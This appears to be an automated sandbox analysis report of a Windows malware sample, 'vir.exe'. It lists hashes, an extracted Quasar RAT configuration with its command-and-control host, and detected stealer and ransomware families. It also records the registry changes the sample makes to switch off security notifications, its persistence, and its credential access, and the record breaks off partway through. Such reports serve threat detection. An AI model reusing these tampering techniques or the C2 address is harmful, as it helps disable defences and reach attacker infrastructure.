Resubmissions
27-09-2024 10:28
240927-mh3m1sxgrm 1018-08-2024 19:49
240818-yjmtqsthkm 1018-08-2024 14:30
240818-rvdxmsxgjg 1015-08-2024 23:29
240815-3g3jmawdnq 1015-08-2024 23:15
240815-28syts1brg 1015-08-2024 22:57
240815-2w8thszepa 1015-08-2024 22:44
240815-2n53natgpj 10Analysis
-
max time kernel
308s -
max time network
318s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
18-08-2024 14:30
Behavioral task
behavioral1
Sample
vir.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
vir.exe
Resource
win11-20240802-en
General
-
Target
vir.exe
-
Size
336.1MB
-
MD5
bc82ea785da1180a8a964b3e54ad106c
-
SHA1
4c1952ce778455af8ed10dca7b9f77d7815e8d0a
-
SHA256
c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
-
SHA512
62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
-
SSDEEP
6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Detect Umbral payload 2 IoCs
Processes:
resource yara_rule behavioral1/files/0x000500000001967e-217.dat family_umbral behavioral1/memory/1484-5159-0x0000000000130000-0x0000000000170000-memory.dmp family_umbral -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
MassLogger
Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.
-
MassLogger Main payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4052-6148-0x0000000000400000-0x0000000000541000-memory.dmp family_masslogger behavioral1/memory/4052-6147-0x0000000001E90000-0x0000000001F2A000-memory.dmp family_masslogger -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
Processes:
ndrhuzubnp.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" ndrhuzubnp.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
ndrhuzubnp.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" ndrhuzubnp.exe -
Quasar payload 11 IoCs
Processes:
resource yara_rule behavioral1/files/0x0005000000019626-213.dat family_quasar behavioral1/memory/3620-4282-0x00000000009C0000-0x0000000000CE4000-memory.dmp family_quasar behavioral1/memory/3128-4325-0x0000000001180000-0x00000000014A4000-memory.dmp family_quasar behavioral1/memory/1672-5062-0x0000000000350000-0x0000000000674000-memory.dmp family_quasar behavioral1/memory/2220-5118-0x00000000059C0000-0x0000000005DFE000-memory.dmp family_quasar behavioral1/memory/3172-5135-0x00000000012C0000-0x00000000015E4000-memory.dmp family_quasar behavioral1/memory/3608-5546-0x0000000001380000-0x00000000016A4000-memory.dmp family_quasar behavioral1/memory/1640-5595-0x00000000003F0000-0x0000000000714000-memory.dmp family_quasar behavioral1/memory/804-5623-0x0000000000010000-0x0000000000334000-memory.dmp family_quasar behavioral1/memory/3476-5634-0x00000000010C0000-0x00000000013E4000-memory.dmp family_quasar behavioral1/memory/2592-5690-0x00000000013A0000-0x00000000016C4000-memory.dmp family_quasar -
Processes:
ndrhuzubnp.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" ndrhuzubnp.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exeflow pid Process 24 3168 mshta.exe 25 3168 mshta.exe 31 3168 mshta.exe 221 3168 mshta.exe 222 3168 mshta.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
ndrhuzubnp.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" ndrhuzubnp.exe -
Downloads MZ/PE file
-
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
Processes:
iexplore.exedescription ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\78D7A2C383C07B3532704B3BA7715678892B83D6\Blob = 0f00000001000000140000003dc3a6638bf463c133f11a1e0a108be50ef49c750200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000610063003300620036006600610037002d0034003600660061002d0034003800640038002d0038003700660066002d0030003800350034006500380062006500650064003100310000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000003000000010000001400000078d7a2c383c07b3532704b3ba7715678892b83d6200000000100000000030000308202fc308201e4a0030201020210721e9878c671e1a04eacb4666ff0efa4300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831383134333135395a180f32313234303732353134333135395a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b5399b4399462619c6d0beb8a56e02511fc15b44dd4163a4e714b43e9b596ec245c39f474efebbe0106de421bf134f1ff97d3beb8e3e7f3145ab2c73fe28540acac40d42345a67d0e30e999bb549de294fa302c47ec58c4482fd741b1ef8a523616a623f2d8741c5e5aeda6128e6b7e08f1a1a068d555e7b15190cb7741d7cd61dd6373374c02d2c4982c1c778115b0e88e3992c6c330e6fc83a3f92c13f5c7c4e18df05444e19a5a13b8244ad89a668c84cec0c60fad87c6b08825774df610e3f4b6a3548d6629ae9897070ee064593dde4ab06749f3ac664dbcb75095c6df865d6ddb41d96ab8656235caa1ccc3d05b3d8519c9a0d87bc7ba7cca8d0cfdf3d0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40454c5a59505446560030090603551d1304023000300d06092a864886f70d01010505000382010100426ec473bab77e61182e41d9ff73ceeebd2bf52f29af2f9a753546e851188ab1fdc010459580b572d98e62a9bb4d8903d8eaa08dd92e03b5370d7e6b2a01b3308a151fd0eb93091a2e7febb0f78f6bccf067e77cf5f42d7f88583a7597b9ddda22c027e0313d05c6b1566a6158d9920efbac11f7c985b9f3866a61bc39f064a0bd1b10bbb968f3a09ce828b40cf820f42e12280791077ace9cc81d3b756149dfe4172dd7e7c2853b5a320d85f11197ebc21f4bf3035a46b731974b4dd3be4943cb13b358a2b3eca5966566ebc5747132633951a12a9b46bf2cd38ca4a8e803df69c783111330559989f4285f3d29d7de60f350b2b93822111e774cb5c6742b8d iexplore.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\78D7A2C383C07B3532704B3BA7715678892B83D6\Blob = 0f00000001000000140000003dc3a6638bf463c133f11a1e0a108be50ef49c7503000000010000001400000078d7a2c383c07b3532704b3ba7715678892b83d6200000000100000000030000308202fc308201e4a0030201020210721e9878c671e1a04eacb4666ff0efa4300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831383134333135395a180f32313234303732353134333135395a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b5399b4399462619c6d0beb8a56e02511fc15b44dd4163a4e714b43e9b596ec245c39f474efebbe0106de421bf134f1ff97d3beb8e3e7f3145ab2c73fe28540acac40d42345a67d0e30e999bb549de294fa302c47ec58c4482fd741b1ef8a523616a623f2d8741c5e5aeda6128e6b7e08f1a1a068d555e7b15190cb7741d7cd61dd6373374c02d2c4982c1c778115b0e88e3992c6c330e6fc83a3f92c13f5c7c4e18df05444e19a5a13b8244ad89a668c84cec0c60fad87c6b08825774df610e3f4b6a3548d6629ae9897070ee064593dde4ab06749f3ac664dbcb75095c6df865d6ddb41d96ab8656235caa1ccc3d05b3d8519c9a0d87bc7ba7cca8d0cfdf3d0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40454c5a59505446560030090603551d1304023000300d06092a864886f70d01010505000382010100426ec473bab77e61182e41d9ff73ceeebd2bf52f29af2f9a753546e851188ab1fdc010459580b572d98e62a9bb4d8903d8eaa08dd92e03b5370d7e6b2a01b3308a151fd0eb93091a2e7febb0f78f6bccf067e77cf5f42d7f88583a7597b9ddda22c027e0313d05c6b1566a6158d9920efbac11f7c985b9f3866a61bc39f064a0bd1b10bbb968f3a09ce828b40cf820f42e12280791077ace9cc81d3b756149dfe4172dd7e7c2853b5a320d85f11197ebc21f4bf3035a46b731974b4dd3be4943cb13b358a2b3eca5966566ebc5747132633951a12a9b46bf2cd38ca4a8e803df69c783111330559989f4285f3d29d7de60f350b2b93822111e774cb5c6742b8d iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates\78D7A2C383C07B3532704B3BA7715678892B83D6\Blob = 0f00000001000000140000003dc3a6638bf463c133f11a1e0a108be50ef49c7503000000010000001400000078d7a2c383c07b3532704b3ba7715678892b83d60200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000610063003300620036006600610037002d0034003600660061002d0034003800640038002d0038003700660066002d0030003800350034006500380062006500650064003100310000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000200000000100000000030000308202fc308201e4a0030201020210721e9878c671e1a04eacb4666ff0efa4300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234303831383134333135395a180f32313234303732353134333135395a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100b5399b4399462619c6d0beb8a56e02511fc15b44dd4163a4e714b43e9b596ec245c39f474efebbe0106de421bf134f1ff97d3beb8e3e7f3145ab2c73fe28540acac40d42345a67d0e30e999bb549de294fa302c47ec58c4482fd741b1ef8a523616a623f2d8741c5e5aeda6128e6b7e08f1a1a068d555e7b15190cb7741d7cd61dd6373374c02d2c4982c1c778115b0e88e3992c6c330e6fc83a3f92c13f5c7c4e18df05444e19a5a13b8244ad89a668c84cec0c60fad87c6b08825774df610e3f4b6a3548d6629ae9897070ee064593dde4ab06749f3ac664dbcb75095c6df865d6ddb41d96ab8656235caa1ccc3d05b3d8519c9a0d87bc7ba7cca8d0cfdf3d0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40454c5a59505446560030090603551d1304023000300d06092a864886f70d01010505000382010100426ec473bab77e61182e41d9ff73ceeebd2bf52f29af2f9a753546e851188ab1fdc010459580b572d98e62a9bb4d8903d8eaa08dd92e03b5370d7e6b2a01b3308a151fd0eb93091a2e7febb0f78f6bccf067e77cf5f42d7f88583a7597b9ddda22c027e0313d05c6b1566a6158d9920efbac11f7c985b9f3866a61bc39f064a0bd1b10bbb968f3a09ce828b40cf820f42e12280791077ace9cc81d3b756149dfe4172dd7e7c2853b5a320d85f11197ebc21f4bf3035a46b731974b4dd3be4943cb13b358a2b3eca5966566ebc5747132633951a12a9b46bf2cd38ca4a8e803df69c783111330559989f4285f3d29d7de60f350b2b93822111e774cb5c6742b8d iexplore.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
Processes:
netsh.exepid Process 1940 netsh.exe -
Possible privilege escalation attempt 5 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exetakeown.exepid Process 3984 icacls.exe 3988 takeown.exe 1692 icacls.exe 1848 icacls.exe 4024 takeown.exe -
.NET Reactor proctector 34 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/2420-374-0x0000000005BF0000-0x0000000006140000-memory.dmp net_reactor behavioral1/memory/2420-375-0x0000000006140000-0x000000000668E000-memory.dmp net_reactor behavioral1/memory/2420-389-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-387-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-385-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-384-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-399-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-419-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-427-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-433-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-440-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-391-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-397-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-404-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-437-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-446-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-443-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-441-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-435-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-431-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-429-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-426-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-423-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-421-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-417-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-415-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-413-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-411-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-410-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-408-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-405-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-401-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-395-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor behavioral1/memory/2420-393-0x0000000006140000-0x0000000006689000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
sjhkhda.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Control Panel\International\Geo\Nation sjhkhda.exe -
Drops startup file 3 IoCs
Processes:
!FIXInj.exenotepad.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7c148ac38012fc3caa04b1bbe75feba0.exe !FIXInj.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win.vbs notepad.exe -
Executes dropped EXE 54 IoCs
Processes:
Rover.exeGoogle.exeregmess.exe1.exe3.exeWinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.tmppsiphon-tunnel-core.exescary.exethe.exewimloader.dllRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeac3.exeRomilyaa.exefreebobux.exeSolaraBootstraper.exeRomilyaa.exewim.dllCLWCP.exeSolaraBootstrapper.exeUmbral.exe!FIXInj.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exef3cb220f1aaa32ca310586e5f62dcab1.exeRomilyaa.exejaffa.exejkka.exendrhuzubnp.exebupqjacxngvmelo.exegjiuvdvi.exekihaslfgtkziw.exeselfaware.exesjhkhda.exeselfaware.exegjiuvdvi.exesjhkhda.exesjhkhda.exepacker.exeselfaware.exeselfaware.exebuild3.exebuild3.exemstsca.exemstsca.exemstsca.exemstsca.exepid Process 2420 Rover.exe 2060 Google.exe 1520 regmess.exe 2852 1.exe 2236 3.exe 3400 WinaeroTweaker-1.40.0.0-setup.exe 3496 WinaeroTweaker-1.40.0.0-setup.tmp 3348 psiphon-tunnel-core.exe 3620 scary.exe 4016 the.exe 3000 wimloader.dll 3128 Romilyaa.exe 3852 Romilyaa.exe 4084 Romilyaa.exe 3080 Romilyaa.exe 3756 Romilyaa.exe 1516 ac3.exe 1672 Romilyaa.exe 3400 freebobux.exe 3744 SolaraBootstraper.exe 3172 Romilyaa.exe 1904 wim.dll 3124 CLWCP.exe 3112 SolaraBootstrapper.exe 1484 Umbral.exe 2444 !FIXInj.exe 3608 Romilyaa.exe 1640 Romilyaa.exe 804 Romilyaa.exe 3476 Romilyaa.exe 2592 Romilyaa.exe 3976 f3cb220f1aaa32ca310586e5f62dcab1.exe 3112 Romilyaa.exe 864 jaffa.exe 2840 jkka.exe 1320 ndrhuzubnp.exe 3592 bupqjacxngvmelo.exe 1364 gjiuvdvi.exe 3316 kihaslfgtkziw.exe 3708 selfaware.exe 2412 sjhkhda.exe 3088 selfaware.exe 2116 gjiuvdvi.exe 4052 sjhkhda.exe 1708 sjhkhda.exe 3124 packer.exe 2592 selfaware.exe 3748 selfaware.exe 3884 build3.exe 3936 build3.exe 3976 mstsca.exe 2220 mstsca.exe 2272 mstsca.exe 3440 mstsca.exe -
Loads dropped DLL 52 IoCs
Processes:
cmd.execmd.exe1.execmd.exeWinaeroTweaker-1.40.0.0-setup.exeWinaeroTweaker-1.40.0.0-setup.tmp3.execmd.exeSolaraBootstraper.exejaffa.exenotepad.exeselfaware.exendrhuzubnp.exevir.exeselfaware.exeselfaware.exeselfaware.exepid Process 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 1668 cmd.exe 1668 cmd.exe 2852 1.exe 2852 1.exe 3324 cmd.exe 3400 WinaeroTweaker-1.40.0.0-setup.exe 3496 WinaeroTweaker-1.40.0.0-setup.tmp 3496 WinaeroTweaker-1.40.0.0-setup.tmp 3496 WinaeroTweaker-1.40.0.0-setup.tmp 3496 WinaeroTweaker-1.40.0.0-setup.tmp 3496 WinaeroTweaker-1.40.0.0-setup.tmp 2236 3.exe 2236 3.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 3612 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2080 cmd.exe 2080 cmd.exe 3744 SolaraBootstraper.exe 3744 SolaraBootstraper.exe 3744 SolaraBootstraper.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 2220 cmd.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 2220 cmd.exe 2220 cmd.exe 2440 notepad.exe 2440 notepad.exe 3708 selfaware.exe 1320 ndrhuzubnp.exe 2544 vir.exe 3088 selfaware.exe 3088 selfaware.exe 2592 selfaware.exe 3748 selfaware.exe 3748 selfaware.exe -
Modifies file permissions 1 TTPs 5 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid Process 1848 icacls.exe 4024 takeown.exe 3984 icacls.exe 3988 takeown.exe 1692 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x000500000001944e-197.dat upx behavioral1/files/0x0005000000019fd3-229.dat upx behavioral1/memory/2236-3425-0x0000000000EA0000-0x00000000024C7000-memory.dmp upx behavioral1/memory/2236-4285-0x0000000000EA0000-0x00000000024C7000-memory.dmp upx behavioral1/memory/3400-5120-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/3400-5432-0x0000000000400000-0x000000000083E000-memory.dmp upx behavioral1/memory/2236-5654-0x0000000000EA0000-0x00000000024C7000-memory.dmp upx -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 37.46.117.28 Destination IP 79.142.76.175 -
Processes:
ndrhuzubnp.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirstRunDisabled = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" ndrhuzubnp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" ndrhuzubnp.exe -
Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
Processes:
sjhkhda.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook sjhkhda.exe Key queried \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook sjhkhda.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook sjhkhda.exe Key opened \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
